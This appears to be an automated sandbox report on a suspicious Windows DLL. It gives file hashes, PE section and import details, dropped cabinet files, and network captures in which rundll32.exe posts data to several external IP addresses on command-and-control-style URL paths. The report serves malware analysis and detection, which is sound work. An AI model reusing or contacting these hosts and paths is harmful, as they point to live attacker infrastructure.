SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMP518F.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMPC2D3.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	modified
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMPC93E.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMPCBA4.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMPCDF4.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\TMPD46F.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 6846 bytes, 1 file
Category:	dropped
Size (bytes):	25638
Entropy (8bit):	7.661017371907356
Encrypted:	false
SSDEEP:	384:jdDP5jIIAjdmdH9mfrggo4eCFYj9R9zPjKeCr2wR9zeOnc:dPiIAjdmN9wXoiYj/9zuR2M9zpc
MD5:	9890A6F691B098E22BA772E942F0A04E
SHA1:	09B8BAF682591B5F446AB952A1D4E323A32B18FB
SHA-256:	26B45563575B9E468D2598563730842CBD0B856084C90CA2DB29D7252A9CD389
SHA-512:	C7DCCE0AB7C98C50A1C80BF232AD04A1E5B26AFF6559F29D5B8BF5A263C94A9BCA77F60D3528BBF23A1D4D908EBD6FA1D3C35D5578D85DA574310C64B319A46D
Malicious:	false
Preview:	MSCF............D...............[7..............hI..........d........4..............environment.xml.v.n.R..4CK.y....J......o..v4....}......xV../.G.%[~.....]@........._.._...o[6.............V}...u.?.........a..8.......)......W}:.....Y6...../v6mU.q.VMC.e....Hb..D...4..CP.3...g....I..h..a.z...^.....T[......8...~.]..N.l.D_......%.......?..2....y....i.d.uU2../.%C.l8..1..&...t..aZN..Q.g.y....v\|....m..l.Oo...y..e4.....+...Z.Z...]7..z.W..f./++.6Z..<..h...g...y9U.-....o.}..OQ.>k.*...[7.....5..Oo[.Vg.u....[..k\g...o.O}....\|.I.C...A...).....?+..[F...[..a.......N.!.[........g.\|..70yC..8yC.7...`...eiuv.d...Gs..g.=...J.H;.C.pA..M........G..[..I}\|...y.M%.;HS..S,CW,..T#P....x.......;.:L...\.q..1.>9..]K....P...3.bM%..... ..d.24.#.~....nq.T...z...u.G.....[....{..n.....-..F.....&..:.....:........&....G....j..................Z.y0.DB....>>S..o.x...yM.k.r.J......qs....t<..uU....?.{..9.W.h[..w...n....!..vM.....B..?...c?q<E..U...u...e.."....'..Ab.Z..

C:\Windows\SoftwareDistribution\SLS\9482F4B4-E343-43B6-B170-9A65BC822C77\sls.cab

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, 17061 bytes, 1 file
Category:	dropped
Size (bytes):	35877
Entropy (8bit):	7.808494103750336
Encrypted:	false
SSDEEP:	768:tgh9VmjA+b9/qATAjMU0psmoibXMn/gNYj/9zdCeYj/9zhY:tQVmM+hqEc0ssdiZzdC9Zz6
MD5:	6ED850DB987B6E83CCF570E9FD7BCCB4
SHA1:	C94BE2AA726E8F3AB75D2B2CF1B2A8C22A567AEE
SHA-256:	0083F4310682CCAC05DD6BF4C11FC337028A18317B0A27AB1505922A8B501C3E
SHA-512:	4A432A1032F9524A7012049FFC436E8AB1D95CDBDC4C834EBA851C50E6AFB2B78C5A293D7B5AAF384CEF622394D5EE3C7DF4EB6A8D220E15A2C5237B196A7AAC
Malicious:	false
Preview:	MSCF.....B......D............................B...I..........d.......&d..............environment.cab.Z...9B&dCK..T\[.-\.....n.;....%........Npw.Np......!..................t...........).J..?.......?.H..........`}.A.^.\.......V.;..................:`[.D....9.=z..j.C..k].....+;jk..7N.,\.a.....s..+Jm.z.z.:.'.5...d...}.8....:;m...w._P..%...y..+t....=..}w\|}.j..f..Uy.......W.m.o..y?..B.kr~..>.ev.Q}..MMN........wb9P.r.$.l....2#h.gJ!.....ly\|;..;..n!,W........]...s.[P&.k]+..7U.48.NI.}9Z=..p(.0.:z..p..m...5...\|....R...h7:.e...j.w.y..@K>..b..{X....WJ....7.gv.X...s&..C...._...N..>.^.r..zl...Lw^.0...pj..._...dd.'......2.\|MX.k....L.X...K.6W..ef.GY.3;.i5.U....].y+....R..g.mM.[^7R..m]...nFhg.H.K...V.%......V...W.....]i#u...F.n..{.gs..E_5p..Nqa.>...6.pq.1.:..t..5;.Xi..~...It.^.3.........X...m@....N..N.{..e..S.w......E*..1...Cn._6P.r.G..yeS..u..^.Y".y.';te..^}P.od.4......e...$...5+;!..mB..H.J.h.......XI....a. x..[...>.w-.....8TU..L.a......f0.H..:..

C:\Windows\WindowsUpdate.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	276
Entropy (8bit):	4.850098938673388
Encrypted:	false
SSDEEP:	6:jBJf4xH+hqJtXFvE4w/4pLYGKLjQpgjqcTGMKn8EYeDPOCd6X:jBJkGKlFvE41U/Qpgjq3rDDPOrX
MD5:	2CC83D93DD1DDE691158CF5E9882420B
SHA1:	49BFDC6E1E73E09A0DEC345CA15B72D167ADD3B6
SHA-256:	455EC4F5B15557762B893388B591CA9F3E822675AB94FC6664AA4EC8C41CB295
SHA-512:	E67F883A016B7A410F4461492BCE124421BDDCCF4544322B9A460A56DF469170B2323FD0325E2CF928193FB6A1323C31CB0D464097F25D2F9B11AF3BF9CA1B4D
Malicious:	false
Preview:	Windows Update logs are now generated using ETW (Event Tracing for Windows)...Please run the Get-WindowsUpdateLog PowerShell command to convert ETW traces into a readable WindowsUpdate.log.......For more information, please visit https://go.microsoft.com/fwlink/?LinkId=518345

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.3962009940158335
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	sample.dll
File size:	348504
MD5:	8d925c0da257436438893e6fe7ce2f4f
SHA1:	c0ff465eb0b6ccc0f3a36bb593ced7453736a750
SHA256:	16488a25bf5ef3bb38f176f1843bfabfc4a3d0beec81f4ac0410cf7856bc777c
SHA512:	924c2af98d0fbcc93366628e78476ca9051643fc0f9f3d93cdcdf1132721fe3e188bdb0ca4040bdec0ac479f173b076ca55be57073222915314bdca6e7503841
SSDEEP:	3072:KRq1sFAd2gQ5PmBvNZwnnq1gn2RvoXiDzAYgrO1v2F5j8eFMWP:Eq1sFAwgwmBv3wnIgG4oAYxvU54e/P
TLSH:	D274BE699A8BC049CF0E3AB06BA32D67D5326F9D67843173F6512D0901B3EFD2AD540E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P.............................................................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:	0x10001950
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x600B468F [Fri Jan 22 21:41:35 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	3
OS Version Minor:	0
File Version Major:	3
File Version Minor:	0
Subsystem Version Major:	3
Subsystem Version Minor:	0
Import Hash:	de3ae5fdd8a570c86ac164493e1298ec

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0Ch
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h
mov dword ptr [ebp-04h], 00000241h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x60e8	0x64	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x51400	0x1558	.text4
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x58000	0x3e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x61ac	0x60	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x369e	0x3800	False	0.11739676339285714	data	4.226682747705754	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5000	0x57	0x200	False	0.17578125	data	1.3360550685091697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x6000	0x490	0x400	False	0.490234375	data	4.201496192633559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text4	0x7000	0x4c5a4	0x4c600	False	0.38666121112929625	data	4.030124461979981	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text8	0x54000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text7	0x55000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text6	0x56000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text5	0x57000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x58000	0x3e0	0x400	False	0.8759765625	data	6.338821987534988	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, LoadLibraryA, GetProcAddress, GetLastError
USER32.dll	LoadCursorA, DrawMenuBar, wsprintfW, PostMessageA, EnumChildWindows, SendMessageTimeoutA, GetWindowTextA, EnumWindows, SendMessageA, wsprintfA, GetClassNameA
GDI32.dll	AddFontResourceW, RealizePalette, CreateMetaFileW
ADVAPI32.dll	RegOpenKeyA, GetUserNameA

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2022 13:43:21.876322031 CEST	49758	80	192.168.2.3	190.55.186.229
Aug 1, 2022 13:43:24.862284899 CEST	49758	80	192.168.2.3	190.55.186.229
Aug 1, 2022 13:43:30.862915039 CEST	49758	80	192.168.2.3	190.55.186.229
Aug 1, 2022 13:43:49.439256907 CEST	49759	7080	192.168.2.3	203.157.152.9
Aug 1, 2022 13:43:52.442835093 CEST	49759	7080	192.168.2.3	203.157.152.9
Aug 1, 2022 13:43:58.443178892 CEST	49759	7080	192.168.2.3	203.157.152.9
Aug 1, 2022 13:44:17.789232016 CEST	49767	443	192.168.2.3	157.245.145.87
Aug 1, 2022 13:44:17.789284945 CEST	443	49767	157.245.145.87	192.168.2.3
Aug 1, 2022 13:44:17.789375067 CEST	49767	443	192.168.2.3	157.245.145.87
Aug 1, 2022 13:44:17.789920092 CEST	49767	443	192.168.2.3	157.245.145.87
Aug 1, 2022 13:44:17.789940119 CEST	443	49767	157.245.145.87	192.168.2.3
Aug 1, 2022 13:44:17.790004969 CEST	49767	443	192.168.2.3	157.245.145.87
Aug 1, 2022 13:44:17.790014982 CEST	443	49767	157.245.145.87	192.168.2.3
Aug 1, 2022 13:44:17.790072918 CEST	443	49767	157.245.145.87	192.168.2.3
Aug 1, 2022 13:44:23.212585926 CEST	49769	8080	192.168.2.3	109.99.146.210
Aug 1, 2022 13:44:26.211258888 CEST	49769	8080	192.168.2.3	109.99.146.210
Aug 1, 2022 13:44:32.227391958 CEST	49769	8080	192.168.2.3	109.99.146.210
Aug 1, 2022 13:44:52.421894073 CEST	49800	8080	192.168.2.3	116.202.10.123
Aug 1, 2022 13:44:55.432491064 CEST	49800	8080	192.168.2.3	116.202.10.123
Aug 1, 2022 13:45:01.446198940 CEST	49800	8080	192.168.2.3	116.202.10.123
Aug 1, 2022 13:45:18.548077106 CEST	49809	8080	192.168.2.3	172.96.190.154
Aug 1, 2022 13:45:18.707463980 CEST	8080	49809	172.96.190.154	192.168.2.3
Aug 1, 2022 13:45:19.210547924 CEST	49809	8080	192.168.2.3	172.96.190.154
Aug 1, 2022 13:45:19.370034933 CEST	8080	49809	172.96.190.154	192.168.2.3
Aug 1, 2022 13:45:19.882267952 CEST	49809	8080	192.168.2.3	172.96.190.154
Aug 1, 2022 13:45:20.041363001 CEST	8080	49809	172.96.190.154	192.168.2.3
Aug 1, 2022 13:45:29.466618061 CEST	49832	443	192.168.2.3	163.53.204.180
Aug 1, 2022 13:45:29.466703892 CEST	443	49832	163.53.204.180	192.168.2.3
Aug 1, 2022 13:45:29.466810942 CEST	49832	443	192.168.2.3	163.53.204.180
Aug 1, 2022 13:45:29.467653990 CEST	49832	443	192.168.2.3	163.53.204.180
Aug 1, 2022 13:45:29.467685938 CEST	443	49832	163.53.204.180	192.168.2.3
Aug 1, 2022 13:45:29.467722893 CEST	49832	443	192.168.2.3	163.53.204.180
Aug 1, 2022 13:45:29.467740059 CEST	443	49832	163.53.204.180	192.168.2.3
Aug 1, 2022 13:45:29.467775106 CEST	443	49832	163.53.204.180	192.168.2.3
Aug 1, 2022 13:45:34.537707090 CEST	49833	80	192.168.2.3	190.107.118.125
Aug 1, 2022 13:45:37.540117979 CEST	49833	80	192.168.2.3	190.107.118.125
Aug 1, 2022 13:45:43.540621042 CEST	49833	80	192.168.2.3	190.107.118.125
Aug 1, 2022 13:46:03.387027979 CEST	49834	8080	192.168.2.3	91.93.3.85
Aug 1, 2022 13:46:06.402008057 CEST	49834	8080	192.168.2.3	91.93.3.85
Aug 1, 2022 13:46:12.418180943 CEST	49834	8080	192.168.2.3	91.93.3.85

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 1, 2022 13:44:26.275891066 CEST	109.99.146.210	192.168.2.3	c006	(Host unreachable)	Destination Unreachable
Aug 1, 2022 13:44:26.275934935 CEST	109.99.146.210	192.168.2.3	c006	(Host unreachable)	Destination Unreachable
Aug 1, 2022 13:44:32.464061975 CEST	109.99.146.210	192.168.2.3	c006	(Host unreachable)	Destination Unreachable

HTTP Request Dependency Graph

157.245.145.87

157.245.145.87:443

163.53.204.180

163.53.204.180:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49767	157.245.145.87	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 13:44:17.789920092 CEST	9015	OUT	POST /mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/ HTTP/1.1 DNT: 0 Referer: 157.245.145.87/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/ Content-Type: multipart/form-data; boundary=-----------------------mlpYKhZmEPpzkygQscIgNsf User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 157.245.145.87:443 Content-Length: 5636 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49832	163.53.204.180	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 1, 2022 13:45:29.467653990 CEST	11353	OUT	POST /8vl90912xxgd2/vzcu9no9/ HTTP/1.1 DNT: 0 Referer: 163.53.204.180/8vl90912xxgd2/vzcu9no9/ Content-Type: multipart/form-data; boundary=---------------57LyBAPiCcL27kG User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 163.53.204.180:443 Content-Length: 5604 Connection: Keep-Alive Cache-Control: no-cache

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 5836, Parent PID: 5308

General

Target ID:	0
Start time:	13:42:05
